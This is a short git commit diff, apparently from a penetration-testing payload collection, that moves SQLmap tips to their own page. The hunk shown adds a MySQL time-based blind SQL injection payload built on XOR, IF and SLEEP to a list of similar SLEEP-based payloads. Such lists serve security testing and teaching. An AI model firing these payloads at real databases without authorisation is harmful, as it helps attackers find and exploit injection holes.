SQLmap tips moved from SQL README to their own page

This commit is contained in:
Swissky
2024-11-02 22:47:30 +01:00
parent d77ef2c4fc
commit 944fe0db7b
4 changed files with 270 additions and 229 deletions

View File

@@ -374,6 +374,7 @@ The following SQL codes will delay the output from MySQL.
```sql
RLIKE SLEEP([SLEEPTIME])
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
XOR(IF(NOW()=SYSDATE(),SLEEP(5),0))XOR
```
### Using SLEEP in a subselect